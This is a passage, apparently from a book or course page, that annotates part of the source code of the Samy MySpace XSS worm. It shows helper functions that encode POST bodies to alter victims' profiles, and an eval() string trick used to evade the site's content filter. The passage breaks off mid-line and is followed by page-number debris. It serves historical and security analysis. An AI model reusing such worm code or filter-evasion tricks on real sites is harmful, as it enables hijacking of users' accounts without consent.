This is
// used for a when Samy wanted to do an HTTP request and did not care about
// the response (like CSRF).
function nothing() {}
// Convert the queryParameterArray back to a "&" delimited string with some
// URL encoding. The string is used as the body of POST request that changes
// the viticim's information.
function parameterArrayToParameterString(queryParameterArray) {
var N = new String();
var O = 0;
for (var P in queryParameterArray) {
if (O>0) {
N += '&';
}
var Q = escape(queryParameterArray[P]);
while (Q.indexOf('+') != -1) {
Q = Q.replace('+','%2B');
}
while (Q.indexOf('&') != -1) {
Q = Q.replace('&','%26');
}
N += P + '=' + Q;
O++;
64
}
return N;
}
// This is the first of two POST requests that the worm does on behalf of
// the user. This function simply makes a request to "url" with POST body
// "xhrBody" and runs "xhrCallbackFunction()" when the HTTP response is
// complete.
function httpSend(url, xhrCallbackFunction, requestAction, xhrBody) {
if (!xmlHttpRequest) {
return false
}
// Apparently, Myspace blocked user content with "onreadystatechange", so
// Samy used string contentation with eval() to circumvent the blocking.
eval('xmlHttpRequest.
Pages:
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153